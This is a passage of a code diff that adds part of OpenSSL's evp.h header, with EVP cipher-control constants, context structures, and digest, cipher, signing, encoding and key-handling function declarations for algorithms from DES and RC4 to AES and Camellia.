+# define         EVP_CIPHER_CTX_FLAG_WRAP_ALLOW  0x1
+
+/* ctrl() values */
+
+# define         EVP_CTRL_INIT                   0x0
+# define         EVP_CTRL_SET_KEY_LENGTH         0x1
+# define         EVP_CTRL_GET_RC2_KEY_BITS       0x2
+# define         EVP_CTRL_SET_RC2_KEY_BITS       0x3
+# define         EVP_CTRL_GET_RC5_ROUNDS         0x4
+# define         EVP_CTRL_SET_RC5_ROUNDS         0x5
+# define         EVP_CTRL_RAND_KEY               0x6
+# define         EVP_CTRL_PBE_PRF_NID            0x7
+# define         EVP_CTRL_COPY                   0x8
+# define         EVP_CTRL_GCM_SET_IVLEN          0x9
+# define         EVP_CTRL_GCM_GET_TAG            0x10
+# define         EVP_CTRL_GCM_SET_TAG            0x11
+# define         EVP_CTRL_GCM_SET_IV_FIXED       0x12
+# define         EVP_CTRL_GCM_IV_GEN             0x13
+# define         EVP_CTRL_CCM_SET_IVLEN          EVP_CTRL_GCM_SET_IVLEN
+# define         EVP_CTRL_CCM_GET_TAG            EVP_CTRL_GCM_GET_TAG
+# define         EVP_CTRL_CCM_SET_TAG            EVP_CTRL_GCM_SET_TAG
+# define         EVP_CTRL_CCM_SET_L              0x14
+# define         EVP_CTRL_CCM_SET_MSGLEN         0x15
+/*
+ * AEAD cipher deduces payload length and returns number of bytes required to
+ * store MAC and eventual padding. Subsequent call to EVP_Cipher even
+ * appends/verifies MAC.
+ */
+# define         EVP_CTRL_AEAD_TLS1_AAD          0x16
+/* Used by composite AEAD ciphers, no-op in GCM, CCM... */
+# define         EVP_CTRL_AEAD_SET_MAC_KEY       0x17
+/* Set the GCM invocation field, decrypt only */
+# define         EVP_CTRL_GCM_SET_IV_INV         0x18
+
+# define         EVP_CTRL_TLS1_1_MULTIBLOCK_AAD  0x19
+# define         EVP_CTRL_TLS1_1_MULTIBLOCK_ENCRYPT      0x1a
+# define         EVP_CTRL_TLS1_1_MULTIBLOCK_DECRYPT      0x1b
+# define         EVP_CTRL_TLS1_1_MULTIBLOCK_MAX_BUFSIZE  0x1c
+
+typedef struct {
+    unsigned char *out;
+    const unsigned char *inp;
+    size_t len;
+    unsigned int interleave;
+} EVP_CTRL_TLS1_1_MULTIBLOCK_PARAM;
+
+/* GCM TLS constants */
+/* Length of fixed part of IV derived from PRF */
+# define EVP_GCM_TLS_FIXED_IV_LEN                        4
+/* Length of explicit part of IV part of TLS records */
+# define EVP_GCM_TLS_EXPLICIT_IV_LEN                     8
+/* Length of tag for TLS */
+# define EVP_GCM_TLS_TAG_LEN                             16
+
+typedef struct evp_cipher_info_st {
+    const EVP_CIPHER *cipher;
+    unsigned char iv[EVP_MAX_IV_LENGTH];
+} EVP_CIPHER_INFO;
+
+struct evp_cipher_ctx_st {
+    const EVP_CIPHER *cipher;
+    ENGINE *engine;             /* functional reference if 'cipher' is
+                                 * ENGINE-provided */
+    int encrypt;                /* encrypt or decrypt */
+    int buf_len;                /* number we have left */
+    unsigned char oiv[EVP_MAX_IV_LENGTH]; /* original iv */
+    unsigned char iv[EVP_MAX_IV_LENGTH]; /* working iv */
+    unsigned char buf[EVP_MAX_BLOCK_LENGTH]; /* saved partial block */
+    int num;                    /* used by cfb/ofb/ctr mode */
+    void *app_data;             /* application stuff */
+    int key_len;                /* May change for variable length cipher */
+    unsigned long flags;        /* Various flags */
+    void *cipher_data;          /* per EVP data */
+    int final_used;
+    int block_mask;
+    unsigned char final[EVP_MAX_BLOCK_LENGTH]; /* possible final block */
+} /* EVP_CIPHER_CTX */ ;
+
+typedef struct evp_Encode_Ctx_st {
+    /* number saved in a partial encode/decode */
+    int num;
+    /*
+     * The length is either the output line length (in input bytes) or the
+     * shortest input line length that is ok.  Once decoding begins, the
+     * length is adjusted up each time a longer line is decoded
+     */
+    int length;
+    /* data to encode */
+    unsigned char enc_data[80];
+    /* number read on current line */
+    int line_num;
+    int expect_nl;
+} EVP_ENCODE_CTX;
+
+/* Password based encryption function */
+typedef int (EVP_PBE_KEYGEN) (EVP_CIPHER_CTX *ctx, const char *pass,
+                              int passlen, ASN1_TYPE *param,
+                              const EVP_CIPHER *cipher, const EVP_MD *md,
+                              int en_de);
+
+# ifndef OPENSSL_NO_RSA
+#  define EVP_PKEY_assign_RSA(pkey,rsa) EVP_PKEY_assign((pkey),EVP_PKEY_RSA,\
+                                        (char *)(rsa))
+# endif
+
+# ifndef OPENSSL_NO_DSA
+#  define EVP_PKEY_assign_DSA(pkey,dsa) EVP_PKEY_assign((pkey),EVP_PKEY_DSA,\
+                                        (char *)(dsa))
+# endif
+
+# ifndef OPENSSL_NO_DH
+#  define EVP_PKEY_assign_DH(pkey,dh) EVP_PKEY_assign((pkey),EVP_PKEY_DH,\
+                                        (char *)(dh))
+# endif
+
+# ifndef OPENSSL_NO_EC
+#  define EVP_PKEY_assign_EC_KEY(pkey,eckey) EVP_PKEY_assign((pkey),EVP_PKEY_EC,\
+                                        (char *)(eckey))
+# endif
+
+/* Add some extra combinations */
+# define EVP_get_digestbynid(a) EVP_get_digestbyname(OBJ_nid2sn(a))
+# define EVP_get_digestbyobj(a) EVP_get_digestbynid(OBJ_obj2nid(a))
+# define EVP_get_cipherbynid(a) EVP_get_cipherbyname(OBJ_nid2sn(a))
+# define EVP_get_cipherbyobj(a) EVP_get_cipherbynid(OBJ_obj2nid(a))
+
+int EVP_MD_type(const EVP_MD *md);
+# define EVP_MD_nid(e)                   EVP_MD_type(e)
+# define EVP_MD_name(e)                  OBJ_nid2sn(EVP_MD_nid(e))
+int EVP_MD_pkey_type(const EVP_MD *md);
+int EVP_MD_size(const EVP_MD *md);
+int EVP_MD_block_size(const EVP_MD *md);
+unsigned long EVP_MD_flags(const EVP_MD *md);
+
+const EVP_MD *EVP_MD_CTX_md(const EVP_MD_CTX *ctx);
+# define EVP_MD_CTX_size(e)              EVP_MD_size(EVP_MD_CTX_md(e))
+# define EVP_MD_CTX_block_size(e)        EVP_MD_block_size(EVP_MD_CTX_md(e))
+# define EVP_MD_CTX_type(e)              EVP_MD_type(EVP_MD_CTX_md(e))
+
+int EVP_CIPHER_nid(const EVP_CIPHER *cipher);
+# define EVP_CIPHER_name(e)              OBJ_nid2sn(EVP_CIPHER_nid(e))
+int EVP_CIPHER_block_size(const EVP_CIPHER *cipher);
+int EVP_CIPHER_key_length(const EVP_CIPHER *cipher);
+int EVP_CIPHER_iv_length(const EVP_CIPHER *cipher);
+unsigned long EVP_CIPHER_flags(const EVP_CIPHER *cipher);
+# define EVP_CIPHER_mode(e)              (EVP_CIPHER_flags(e) & EVP_CIPH_MODE)
+
+const EVP_CIPHER *EVP_CIPHER_CTX_cipher(const EVP_CIPHER_CTX *ctx);
+int EVP_CIPHER_CTX_nid(const EVP_CIPHER_CTX *ctx);
+int EVP_CIPHER_CTX_block_size(const EVP_CIPHER_CTX *ctx);
+int EVP_CIPHER_CTX_key_length(const EVP_CIPHER_CTX *ctx);
+int EVP_CIPHER_CTX_iv_length(const EVP_CIPHER_CTX *ctx);
+int EVP_CIPHER_CTX_copy(EVP_CIPHER_CTX *out, const EVP_CIPHER_CTX *in);
+void *EVP_CIPHER_CTX_get_app_data(const EVP_CIPHER_CTX *ctx);
+void EVP_CIPHER_CTX_set_app_data(EVP_CIPHER_CTX *ctx, void *data);
+# define EVP_CIPHER_CTX_type(c)         EVP_CIPHER_type(EVP_CIPHER_CTX_cipher(c))
+unsigned long EVP_CIPHER_CTX_flags(const EVP_CIPHER_CTX *ctx);
+# define EVP_CIPHER_CTX_mode(e)          (EVP_CIPHER_CTX_flags(e) & EVP_CIPH_MODE)
+
+# define EVP_ENCODE_LENGTH(l)    (((l+2)/3*4)+(l/48+1)*2+80)
+# define EVP_DECODE_LENGTH(l)    ((l+3)/4*3+80)
+
+# define EVP_SignInit_ex(a,b,c)          EVP_DigestInit_ex(a,b,c)
+# define EVP_SignInit(a,b)               EVP_DigestInit(a,b)
+# define EVP_SignUpdate(a,b,c)           EVP_DigestUpdate(a,b,c)
+# define EVP_VerifyInit_ex(a,b,c)        EVP_DigestInit_ex(a,b,c)
+# define EVP_VerifyInit(a,b)             EVP_DigestInit(a,b)
+# define EVP_VerifyUpdate(a,b,c)         EVP_DigestUpdate(a,b,c)
+# define EVP_OpenUpdate(a,b,c,d,e)       EVP_DecryptUpdate(a,b,c,d,e)
+# define EVP_SealUpdate(a,b,c,d,e)       EVP_EncryptUpdate(a,b,c,d,e)
+# define EVP_DigestSignUpdate(a,b,c)     EVP_DigestUpdate(a,b,c)
+# define EVP_DigestVerifyUpdate(a,b,c)   EVP_DigestUpdate(a,b,c)
+
+# ifdef CONST_STRICT
+void BIO_set_md(BIO *, const EVP_MD *md);
+# else
+#  define BIO_set_md(b,md)               BIO_ctrl(b,BIO_C_SET_MD,0,(char *)md)
+# endif
+# define BIO_get_md(b,mdp)               BIO_ctrl(b,BIO_C_GET_MD,0,(char *)mdp)
+# define BIO_get_md_ctx(b,mdcp)     BIO_ctrl(b,BIO_C_GET_MD_CTX,0,(char *)mdcp)
+# define BIO_set_md_ctx(b,mdcp)     BIO_ctrl(b,BIO_C_SET_MD_CTX,0,(char *)mdcp)
+# define BIO_get_cipher_status(b)        BIO_ctrl(b,BIO_C_GET_CIPHER_STATUS,0,NULL)
+# define BIO_get_cipher_ctx(b,c_pp)      BIO_ctrl(b,BIO_C_GET_CIPHER_CTX,0,(char *)c_pp)
+
+int EVP_Cipher(EVP_CIPHER_CTX *c,
+               unsigned char *out, const unsigned char *in, unsigned int inl);
+
+# define EVP_add_cipher_alias(n,alias) \
+        OBJ_NAME_add((alias),OBJ_NAME_TYPE_CIPHER_METH|OBJ_NAME_ALIAS,(n))
+# define EVP_add_digest_alias(n,alias) \
+        OBJ_NAME_add((alias),OBJ_NAME_TYPE_MD_METH|OBJ_NAME_ALIAS,(n))
+# define EVP_delete_cipher_alias(alias) \
+        OBJ_NAME_remove(alias,OBJ_NAME_TYPE_CIPHER_METH|OBJ_NAME_ALIAS);
+# define EVP_delete_digest_alias(alias) \
+        OBJ_NAME_remove(alias,OBJ_NAME_TYPE_MD_METH|OBJ_NAME_ALIAS);
+
+void EVP_MD_CTX_init(EVP_MD_CTX *ctx);
+int EVP_MD_CTX_cleanup(EVP_MD_CTX *ctx);
+EVP_MD_CTX *EVP_MD_CTX_create(void);
+void EVP_MD_CTX_destroy(EVP_MD_CTX *ctx);
+int EVP_MD_CTX_copy_ex(EVP_MD_CTX *out, const EVP_MD_CTX *in);
+void EVP_MD_CTX_set_flags(EVP_MD_CTX *ctx, int flags);
+void EVP_MD_CTX_clear_flags(EVP_MD_CTX *ctx, int flags);
+int EVP_MD_CTX_test_flags(const EVP_MD_CTX *ctx, int flags);
+int EVP_DigestInit_ex(EVP_MD_CTX *ctx, const EVP_MD *type, ENGINE *impl);
+int EVP_DigestUpdate(EVP_MD_CTX *ctx, const void *d, size_t cnt);
+int EVP_DigestFinal_ex(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s);
+int EVP_Digest(const void *data, size_t count,
+               unsigned char *md, unsigned int *size, const EVP_MD *type,
+               ENGINE *impl);
+
+int EVP_MD_CTX_copy(EVP_MD_CTX *out, const EVP_MD_CTX *in);
+int EVP_DigestInit(EVP_MD_CTX *ctx, const EVP_MD *type);
+int EVP_DigestFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s);
+
+int EVP_read_pw_string(char *buf, int length, const char *prompt, int verify);
+int EVP_read_pw_string_min(char *buf, int minlen, int maxlen,
+                           const char *prompt, int verify);
+void EVP_set_pw_prompt(const char *prompt);
+char *EVP_get_pw_prompt(void);
+
+int EVP_BytesToKey(const EVP_CIPHER *type, const EVP_MD *md,
+                   const unsigned char *salt, const unsigned char *data,
+                   int datal, int count, unsigned char *key,
+                   unsigned char *iv);
+
+void EVP_CIPHER_CTX_set_flags(EVP_CIPHER_CTX *ctx, int flags);
+void EVP_CIPHER_CTX_clear_flags(EVP_CIPHER_CTX *ctx, int flags);
+int EVP_CIPHER_CTX_test_flags(const EVP_CIPHER_CTX *ctx, int flags);
+
+int EVP_EncryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                    const unsigned char *key, const unsigned char *iv);
+int EVP_EncryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                       ENGINE *impl, const unsigned char *key,
+                       const unsigned char *iv);
+int EVP_EncryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
+                      const unsigned char *in, int inl);
+int EVP_EncryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
+int EVP_EncryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
+
+int EVP_DecryptInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                    const unsigned char *key, const unsigned char *iv);
+int EVP_DecryptInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                       ENGINE *impl, const unsigned char *key,
+                       const unsigned char *iv);
+int EVP_DecryptUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
+                      const unsigned char *in, int inl);
+int EVP_DecryptFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
+int EVP_DecryptFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
+
+int EVP_CipherInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                   const unsigned char *key, const unsigned char *iv,
+                   int enc);
+int EVP_CipherInit_ex(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *cipher,
+                      ENGINE *impl, const unsigned char *key,
+                      const unsigned char *iv, int enc);
+int EVP_CipherUpdate(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl,
+                     const unsigned char *in, int inl);
+int EVP_CipherFinal(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
+int EVP_CipherFinal_ex(EVP_CIPHER_CTX *ctx, unsigned char *outm, int *outl);
+
+int EVP_SignFinal(EVP_MD_CTX *ctx, unsigned char *md, unsigned int *s,
+                  EVP_PKEY *pkey);
+
+int EVP_VerifyFinal(EVP_MD_CTX *ctx, const unsigned char *sigbuf,
+                    unsigned int siglen, EVP_PKEY *pkey);
+
+int EVP_DigestSignInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+                       const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
+int EVP_DigestSignFinal(EVP_MD_CTX *ctx,
+                        unsigned char *sigret, size_t *siglen);
+
+int EVP_DigestVerifyInit(EVP_MD_CTX *ctx, EVP_PKEY_CTX **pctx,
+                         const EVP_MD *type, ENGINE *e, EVP_PKEY *pkey);
+int EVP_DigestVerifyFinal(EVP_MD_CTX *ctx,
+                          const unsigned char *sig, size_t siglen);
+
+int EVP_OpenInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+                 const unsigned char *ek, int ekl, const unsigned char *iv,
+                 EVP_PKEY *priv);
+int EVP_OpenFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
+
+int EVP_SealInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+                 unsigned char **ek, int *ekl, unsigned char *iv,
+                 EVP_PKEY **pubk, int npubk);
+int EVP_SealFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl);
+
+void EVP_EncodeInit(EVP_ENCODE_CTX *ctx);
+void EVP_EncodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
+                      const unsigned char *in, int inl);
+void EVP_EncodeFinal(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl);
+int EVP_EncodeBlock(unsigned char *t, const unsigned char *f, int n);
+
+void EVP_DecodeInit(EVP_ENCODE_CTX *ctx);
+int EVP_DecodeUpdate(EVP_ENCODE_CTX *ctx, unsigned char *out, int *outl,
+                     const unsigned char *in, int inl);
+int EVP_DecodeFinal(EVP_ENCODE_CTX *ctx, unsigned
+                    char *out, int *outl);
+int EVP_DecodeBlock(unsigned char *t, const unsigned char *f, int n);
+
+void EVP_CIPHER_CTX_init(EVP_CIPHER_CTX *a);
+int EVP_CIPHER_CTX_cleanup(EVP_CIPHER_CTX *a);
+EVP_CIPHER_CTX *EVP_CIPHER_CTX_new(void);
+void EVP_CIPHER_CTX_free(EVP_CIPHER_CTX *a);
+int EVP_CIPHER_CTX_set_key_length(EVP_CIPHER_CTX *x, int keylen);
+int EVP_CIPHER_CTX_set_padding(EVP_CIPHER_CTX *c, int pad);
+int EVP_CIPHER_CTX_ctrl(EVP_CIPHER_CTX *ctx, int type, int arg, void *ptr);
+int EVP_CIPHER_CTX_rand_key(EVP_CIPHER_CTX *ctx, unsigned char *key);
+
+# ifndef OPENSSL_NO_BIO
+BIO_METHOD *BIO_f_md(void);
+BIO_METHOD *BIO_f_base64(void);
+BIO_METHOD *BIO_f_cipher(void);
+BIO_METHOD *BIO_f_reliable(void);
+void BIO_set_cipher(BIO *b, const EVP_CIPHER *c, const unsigned char *k,
+                    const unsigned char *i, int enc);
+# endif
+
+const EVP_MD *EVP_md_null(void);
+# ifndef OPENSSL_NO_MD2
+const EVP_MD *EVP_md2(void);
+# endif
+# ifndef OPENSSL_NO_MD4
+const EVP_MD *EVP_md4(void);
+# endif
+# ifndef OPENSSL_NO_MD5
+const EVP_MD *EVP_md5(void);
+# endif
+# ifndef OPENSSL_NO_SHA
+const EVP_MD *EVP_sha(void);
+const EVP_MD *EVP_sha1(void);
+const EVP_MD *EVP_dss(void);
+const EVP_MD *EVP_dss1(void);
+const EVP_MD *EVP_ecdsa(void);
+# endif
+# ifndef OPENSSL_NO_SHA256
+const EVP_MD *EVP_sha224(void);
+const EVP_MD *EVP_sha256(void);
+# endif
+# ifndef OPENSSL_NO_SHA512
+const EVP_MD *EVP_sha384(void);
+const EVP_MD *EVP_sha512(void);
+# endif
+# ifndef OPENSSL_NO_MDC2
+const EVP_MD *EVP_mdc2(void);
+# endif
+# ifndef OPENSSL_NO_RIPEMD
+const EVP_MD *EVP_ripemd160(void);
+# endif
+# ifndef OPENSSL_NO_WHIRLPOOL
+const EVP_MD *EVP_whirlpool(void);
+# endif
+const EVP_CIPHER *EVP_enc_null(void); /* does nothing :-) */
+# ifndef OPENSSL_NO_DES
+const EVP_CIPHER *EVP_des_ecb(void);
+const EVP_CIPHER *EVP_des_ede(void);
+const EVP_CIPHER *EVP_des_ede3(void);
+const EVP_CIPHER *EVP_des_ede_ecb(void);
+const EVP_CIPHER *EVP_des_ede3_ecb(void);
+const EVP_CIPHER *EVP_des_cfb64(void);
+#  define EVP_des_cfb EVP_des_cfb64
+const EVP_CIPHER *EVP_des_cfb1(void);
+const EVP_CIPHER *EVP_des_cfb8(void);
+const EVP_CIPHER *EVP_des_ede_cfb64(void);
+#  define EVP_des_ede_cfb EVP_des_ede_cfb64
+#  if 0
+const EVP_CIPHER *EVP_des_ede_cfb1(void);
+const EVP_CIPHER *EVP_des_ede_cfb8(void);
+#  endif
+const EVP_CIPHER *EVP_des_ede3_cfb64(void);
+#  define EVP_des_ede3_cfb EVP_des_ede3_cfb64
+const EVP_CIPHER *EVP_des_ede3_cfb1(void);
+const EVP_CIPHER *EVP_des_ede3_cfb8(void);
+const EVP_CIPHER *EVP_des_ofb(void);
+const EVP_CIPHER *EVP_des_ede_ofb(void);
+const EVP_CIPHER *EVP_des_ede3_ofb(void);
+const EVP_CIPHER *EVP_des_cbc(void);
+const EVP_CIPHER *EVP_des_ede_cbc(void);
+const EVP_CIPHER *EVP_des_ede3_cbc(void);
+const EVP_CIPHER *EVP_desx_cbc(void);
+const EVP_CIPHER *EVP_des_ede3_wrap(void);
+/*
+ * This should now be supported through the dev_crypto ENGINE. But also, why
+ * are rc4 and md5 declarations made here inside a "NO_DES" precompiler
+ * branch?
+ */
+#  if 0
+#   ifdef OPENSSL_OPENBSD_DEV_CRYPTO
+const EVP_CIPHER *EVP_dev_crypto_des_ede3_cbc(void);
+const EVP_CIPHER *EVP_dev_crypto_rc4(void);
+const EVP_MD *EVP_dev_crypto_md5(void);
+#   endif
+#  endif
+# endif
+# ifndef OPENSSL_NO_RC4
+const EVP_CIPHER *EVP_rc4(void);
+const EVP_CIPHER *EVP_rc4_40(void);
+#  ifndef OPENSSL_NO_MD5
+const EVP_CIPHER *EVP_rc4_hmac_md5(void);
+#  endif
+# endif
+# ifndef OPENSSL_NO_IDEA
+const EVP_CIPHER *EVP_idea_ecb(void);
+const EVP_CIPHER *EVP_idea_cfb64(void);
+#  define EVP_idea_cfb EVP_idea_cfb64
+const EVP_CIPHER *EVP_idea_ofb(void);
+const EVP_CIPHER *EVP_idea_cbc(void);
+# endif
+# ifndef OPENSSL_NO_RC2
+const EVP_CIPHER *EVP_rc2_ecb(void);
+const EVP_CIPHER *EVP_rc2_cbc(void);
+const EVP_CIPHER *EVP_rc2_40_cbc(void);
+const EVP_CIPHER *EVP_rc2_64_cbc(void);
+const EVP_CIPHER *EVP_rc2_cfb64(void);
+#  define EVP_rc2_cfb EVP_rc2_cfb64
+const EVP_CIPHER *EVP_rc2_ofb(void);
+# endif
+# ifndef OPENSSL_NO_BF
+const EVP_CIPHER *EVP_bf_ecb(void);
+const EVP_CIPHER *EVP_bf_cbc(void);
+const EVP_CIPHER *EVP_bf_cfb64(void);
+#  define EVP_bf_cfb EVP_bf_cfb64
+const EVP_CIPHER *EVP_bf_ofb(void);
+# endif
+# ifndef OPENSSL_NO_CAST
+const EVP_CIPHER *EVP_cast5_ecb(void);
+const EVP_CIPHER *EVP_cast5_cbc(void);
+const EVP_CIPHER *EVP_cast5_cfb64(void);
+#  define EVP_cast5_cfb EVP_cast5_cfb64
+const EVP_CIPHER *EVP_cast5_ofb(void);
+# endif
+# ifndef OPENSSL_NO_RC5
+const EVP_CIPHER *EVP_rc5_32_12_16_cbc(void);
+const EVP_CIPHER *EVP_rc5_32_12_16_ecb(void);
+const EVP_CIPHER *EVP_rc5_32_12_16_cfb64(void);
+#  define EVP_rc5_32_12_16_cfb EVP_rc5_32_12_16_cfb64
+const EVP_CIPHER *EVP_rc5_32_12_16_ofb(void);
+# endif
+# ifndef OPENSSL_NO_AES
+const EVP_CIPHER *EVP_aes_128_ecb(void);
+const EVP_CIPHER *EVP_aes_128_cbc(void);
+const EVP_CIPHER *EVP_aes_128_cfb1(void);
+const EVP_CIPHER *EVP_aes_128_cfb8(void);
+const EVP_CIPHER *EVP_aes_128_cfb128(void);
+#  define EVP_aes_128_cfb EVP_aes_128_cfb128
+const EVP_CIPHER *EVP_aes_128_ofb(void);
+const EVP_CIPHER *EVP_aes_128_ctr(void);
+const EVP_CIPHER *EVP_aes_128_ccm(void);
+const EVP_CIPHER *EVP_aes_128_gcm(void);
+const EVP_CIPHER *EVP_aes_128_xts(void);
+const EVP_CIPHER *EVP_aes_128_wrap(void);
+const EVP_CIPHER *EVP_aes_192_ecb(void);
+const EVP_CIPHER *EVP_aes_192_cbc(void);
+const EVP_CIPHER *EVP_aes_192_cfb1(void);
+const EVP_CIPHER *EVP_aes_192_cfb8(void);
+const EVP_CIPHER *EVP_aes_192_cfb128(void);
+#  define EVP_aes_192_cfb EVP_aes_192_cfb128
+const EVP_CIPHER *EVP_aes_192_ofb(void);
+const EVP_CIPHER *EVP_aes_192_ctr(void);
+const EVP_CIPHER *EVP_aes_192_ccm(void);
+const EVP_CIPHER *EVP_aes_192_gcm(void);
+const EVP_CIPHER *EVP_aes_192_wrap(void);
+const EVP_CIPHER *EVP_aes_256_ecb(void);
+const EVP_CIPHER *EVP_aes_256_cbc(void);
+const EVP_CIPHER *EVP_aes_256_cfb1(void);
+const EVP_CIPHER *EVP_aes_256_cfb8(void);
+const EVP_CIPHER *EVP_aes_256_cfb128(void);
+#  define EVP_aes_256_cfb EVP_aes_256_cfb128
+const EVP_CIPHER *EVP_aes_256_ofb(void);
+const EVP_CIPHER *EVP_aes_256_ctr(void);
+const EVP_CIPHER *EVP_aes_256_ccm(void);
+const EVP_CIPHER *EVP_aes_256_gcm(void);
+const EVP_CIPHER *EVP_aes_256_xts(void);
+const EVP_CIPHER *EVP_aes_256_wrap(void);
+#  if !defined(OPENSSL_NO_SHA) && !defined(OPENSSL_NO_SHA1)
+const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha1(void);
+const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha1(void);
+#  endif
+#  ifndef OPENSSL_NO_SHA256
+const EVP_CIPHER *EVP_aes_128_cbc_hmac_sha256(void);
+const EVP_CIPHER *EVP_aes_256_cbc_hmac_sha256(void);
+#  endif
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+const EVP_CIPHER *EVP_camellia_128_ecb(void);
+const EVP_CIPHER *EVP_camellia_128_cbc(void);
+const EVP_CIPHER *EVP_camellia_128_cfb1(void);
+const EVP_CIPHER *EVP_camellia_128_cfb8(void);
+const EVP_CIPHER *EVP_camellia_128_cfb128(void);
+#  define EVP_camellia_128_cfb EVP_camellia_128_cfb128
+const EVP_CIPHER *EVP_camellia_128_ofb(void);
+const EVP_CIPHER *EVP_camellia_192_ecb(void);
+const EVP_CIPHER *EVP_camellia_192_cbc(void);
+const EVP_CIPHER *EVP_camellia_192_cfb1(void);
+const EVP_CIPHER *EVP_camellia_192_cfb8(void);
+const EVP_CIPHER *EVP_camellia_192_cfb128(void);
+#  define EVP_camellia_192_cfb EVP_camellia_192_cfb128
+const EVP_CIPHER *EVP_camellia_192_ofb(void);
+const EVP_CIPHER *EVP_camellia_256_ecb(void);
+const EVP_CIPHER *EVP_camellia_256_cbc(void);
+const EVP_CIPHER *EVP_camellia_256_cfb1(void);
+const EVP_CIPHER *EVP_camellia_256_cfb8(void);
+const EVP_CIPHER *EVP_camellia_256_cfb128(void);
+#  define EVP_camellia_256_cfb EVP_camellia_256_cfb128
+const EVP_CIPHER *EVP_camellia_256_ofb(void);
+# endif
+
+# ifndef OPENSSL_NO_SEED
+const EVP_CIPHER *EVP_seed_ecb(void);
+const EVP_CIPHER *EVP_seed_cbc(void);
+const EVP_CIPHER *EVP_seed_cfb128(void);
+#  define EVP_seed_cfb EVP_seed_cfb128
+const EVP_CIPHER *EVP_seed_ofb(void);
+# endif
+
+void OPENSSL_add_all_algorithms_noconf(void);
+void OPENSSL_add_all_algorithms_conf(void);
+
+# ifdef OPENSSL_LOAD_CONF
+#  define OpenSSL_add_all_algorithms() \
+                OPENSSL_add_all_algorithms_conf()
+# else
+#  define OpenSSL_add_all_algorithms() \
+                OPENSSL_add_all_algorithms_noconf()
+# endif
+
+void OpenSSL_add_all_ciphers(void);
+void OpenSSL_add_all_digests(void);
+# define SSLeay_add_all_algorithms() OpenSSL_add_all_algorithms()
+# define SSLeay_add_all_ciphers() OpenSSL_add_all_ciphers()
+# define SSLeay_add_all_digests() OpenSSL_add_all_digests()
+
+int EVP_add_cipher(const EVP_CIPHER *cipher);
+int EVP_add_digest(const EVP_MD *digest);
+
+const EVP_CIPHER *EVP_get_cipherbyname(const char *name);
+const EVP_MD *EVP_get_digestbyname(const char *name);
+void EVP_cleanup(void);
+
+void EVP_CIPHER_do_all(void (*fn) (const EVP_CIPHER *ciph,
+                                   const char *from, const char *to, void *x),
+                       void *arg);
+void EVP_CIPHER_do_all_sorted(void (*fn)
+                               (const EVP_CIPHER *ciph, const char *from,
+                                const char *to, void *x), void *arg);
+
+void EVP_MD_do_all(void (*fn) (const EVP_MD *ciph,
+                               const char *from, const char *to, void *x),
+                   void *arg);
+void EVP_MD_do_all_sorted(void (*fn)
+                           (const EVP_MD *ciph, const char *from,
+                            const char *to, void *x), void *arg);
+
+int EVP_PKEY_decrypt_old(unsigned char *dec_key,
+                         const unsigned char *enc_key, int enc_key_len,
+                         EVP_PKEY *private_key);
+int EVP_PKEY_encrypt_old(unsigned char *enc_key,
+                         const unsigned char *key, int key_len,
+                         EVP_PKEY *pub_key);
+int EVP_PKEY_type(int type);
+int EVP_PKEY_id(const EVP_PKEY *pkey);
+int EVP_PKEY_base_id(const EVP_PKEY *pkey);
+int EVP_PKEY_bits(EVP_PKEY *pkey);
+int EVP_PKEY_size(EVP_PKEY *pkey);
+int EVP_PKEY_set_type(EVP_PKEY *pkey, int type);
+int EVP_PKEY_set_type_str(EVP_PKEY *pkey, const char *str, int len);
+int EVP_PKEY_assign(EVP_PKEY *pkey, int type, void *key);
+void *EVP_PKEY_get0(EVP_PKEY *pkey);
+
+# ifndef OPENSSL_NO_RSA
+struct rsa_st;
+int EVP_PKEY_set1_RSA(EVP_PKEY *pkey, struct rsa_st *key);
+struct rsa_st *EVP_PKEY_get1_RSA(EVP_PKEY *pkey);
+# endif
+# ifndef OPENSSL_NO_DSA
+struct dsa_st;
+int EVP_PKEY_set1_DSA(EVP_PKEY *pkey, struct dsa_st *key);
+struct dsa_st *EVP_PKEY_get1_DSA(EVP_PKEY *pkey);
+# endif
+# ifndef OPENSSL_NO_DH
+struct dh_st;
+int EVP_PKEY_set1_DH(EVP_PKEY *pkey, struct dh_st *key);
+struct dh_st *EVP_PKEY_get1_DH(EVP_PKEY *pkey);
+# endif
+# ifndef OPENSSL_NO_EC
+struct ec_key_st;
+int EVP_PKEY_set1_EC_KEY(EVP_PKEY *pkey, struct ec_key_st *key);
+struct ec_key_st *EVP_PKEY_get1_EC_KEY(EVP_PKEY *pkey);
+# endif
+
+EVP_PKEY *EVP_PKEY_new(void);
+void EVP_PKEY_free(EVP_PKEY *pkey);
+
+EVP_PKEY *d2i_PublicKey(int type, EVP_PKEY **a, const unsigned char **pp,
+                        long length);
+int i2d_PublicKey(EVP_PKEY *a, unsigned char **pp);
+
+EVP_PKEY *d2i_PrivateKey(int type, EVP_PKEY **a, const unsigned char **pp,
+                         long length);
